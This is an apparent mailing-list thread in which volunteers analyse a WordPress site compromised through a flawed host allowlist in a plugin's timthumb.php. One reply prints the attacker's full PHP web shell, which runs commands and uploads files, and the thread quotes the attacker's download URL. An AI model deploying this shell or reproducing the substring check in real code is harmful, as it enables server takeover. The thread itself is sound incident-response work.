Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue Dutch WLM skin. It contains a file called timthumb.php with the following code:
// external domains that are allowed to be displayed on your website $allowedSites = array ( 'flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org', );
[...]
foreach ($allowedSites as $site) { if (strpos (strtolower ($url_info['host']), $site) !== false) { $isAllowedSite = true; } }
And the check there is stupid. It just checks if an external url contains flickr.com, not if the url is actually flickr.com. Using this, manipulated gif images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images where it later was executed as php files.
It seems only the index.php was replaced and another text file was added.
As we switched to Elyas red skin last weekend I just removed the old WMNL skin and the haybase plugin.
Regards, Holger
On 23/08/12 18:45, Holger Motzkau wrote:
Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue Dutch WLM skin. It contains a file called timthumb.php with the following code:
// external domains that are allowed to be displayed on your website $allowedSites = array ( 'flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org', );
[...]
foreach ($allowedSites as $site) { if (strpos (strtolower ($url_info['host']), $site) !== false) { $isAllowedSite = true; } }
Seems all websites will need an update.
The above code can be rewritten as: if (preg_match( '/(^|.)(' . str_replace( ".", ".", implode("|", $allowedSites ) ) . ")$/", $url_info['host'] ) { $isAllowedSite = true;}
And the check there is stupid. It just checks if an external url contains flickr.com, not if the url is actually flickr.com. Using this, manipulated gif images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images where it later was executed as php files.
Still, even hardening the above check, the cache folder should not be publicly accessible or executable as php. Malicious code could be present at those domains, too.
Hi Holger,
Op 23-8-2012 18:45, Holger Motzkau schreef:
Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue Dutch WLM skin. It contains a file called timthumb.php with the following code:
https://github.com/hay/haybase/blob/master/src/timthumb.php seems to be older than http://timthumb.googlecode.com/svn/trunk/timthumb.php Code part seems to be changed
// external domains that are allowed to be displayed on your website $allowedSites = array ( 'flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org', );
[...]
foreach ($allowedSites as $site) { if (strpos (strtolower ($url_info['host']), $site) !== false) { $isAllowedSite = true; } }And the check there is stupid. It just checks if an external url contains flickr.com, not if the url is actually flickr.com. Using this, manipulated gif images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images where it later was executed as php files.
More readable code, in short: you can execute commands on the server.
<?php @error_reporting(0); @set_time_limit(0); $bogel = $_GET['bogel']; $osc = $_GET['osc']; if (isset($bogel)) { eval( echo "bogel<br>"; echo "sys:".php_uname()."<br>"; $cmd="echo reload-x"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } ); die; } elseif (isset($osc)) { eval( $cmd=base64_decode($osc); $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; }); } else { eval( $content = stripslashes($_POST['content']); $cfile = $_POST['cfile']; $ufile = $_POST['ufile']; echo '<br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">'; echo '<textarea name=content style="width:585px;height:200px">'.$content.'</textarea><br>'; echo '<input type="text" name="cfile" size="10" value="bogel.php">'; echo '<input name="_create" type="submit" id="_upl" value="Create">'; echo '<input type="file" name="file" size="30"><input type="text" name="ufile" size="10" value="antisux.php">'; echo '<input name="_upload" type="submit" id="_upl" value="Upload"></form>'; if($_POST['_create']){ $handle = fopen($cfile, 'w'); if($handle){ if (fwrite($handle, $content) === FALSE) { echo "Create $cfile GAGAL<br>"; } else { echo "Create $cfile SUKSES !!!<br>"; } fclose($handle); } else { echo 'Create File GAGAL<br><br>'; } } if($_POST['_upload']){ if(@copy($_FILES['file']['tmp_name'], $ufile)) { echo "Upload $ufile SUKSES !!!<br><br>"; } else { echo "Upload $ufile GAGAL !!!<br><br>"; } } ); } ?>
It seems only the index.php was replaced and another text file was added.
Is your accesslog still available? You can hunt down the ip's used and what commands were executed
As we switched to Elyas red skin last weekend I just removed the old WMNL skin and the haybase plugin.
I would suggest everyone still using that plugin should switch to the newer one.
Maarten
Op 23-8-2012 19:21, Maarten Dammers schreef:
<something>
For the people with an over-active spam filter: http://lists.wikimedia.org/pipermail/wikilovesmonuments/2012-August/003666.h...
Maarten
Hej,
I have a backup of everything: The installed scripts, changed files, access log. I can send them to you if you like.
There were two IPs involved, and the script installed another script which was accessed with POST-requests several times, and finally deleted. As the apache-user has quite limited rights and the system was updated nothing severe should have happened. We checked all files which have been changed during the 10 minutes of the activity, and found nothing than two manipulated files.
@Nuno: What URL should we use instead?
//Holger
On Thu, Aug 23, 2012 at 7:32 PM, Maarten Dammers maarten@mdammers.nl wrote:
Op 23-8-2012 19:21, Maarten Dammers schreef:
<something>
For the people with an over-active spam filter: http://lists.wikimedia.org/pipermail/wikilovesmonuments/2012-August/003666.h...
Maarten
Wiki Loves Monuments mailing list WikiLovesMonuments@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikilovesmonuments http://www.wikilovesmonuments.org
Hi Holger,
You should be using module statisticsct from the api. See: http://toolserver.org/~erfgoed/api/api.php
-NT
Em 24-08-2012 07:50, Holger Motzkau escreveu:
Hej,
I have a backup of everything: The installed scripts, changed files, access log. I can send them to you if you like.
There were two IPs involved, and the script installed another script which was accessed with POST-requests several times, and finally deleted. As the apache-user has quite limited rights and the system was updated nothing severe should have happened. We checked all files which have been changed during the 10 minutes of the activity, and found nothing than two manipulated files.
@Nuno: What URL should we use instead?
//Holger
On Thu, Aug 23, 2012 at 7:32 PM, Maarten Dammersmaarten@mdammers.nl wrote:
Op 23-8-2012 19:21, Maarten Dammers schreef:
<something>
For the people with an over-active spam filter: http://lists.wikimedia.org/pipermail/wikilovesmonuments/2012-August/003666.h...
Maarten
Wiki Loves Monuments mailing list WikiLovesMonuments@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikilovesmonuments http://www.wikilovesmonuments.org
wikilovesmonuments@lists.wikimedia.org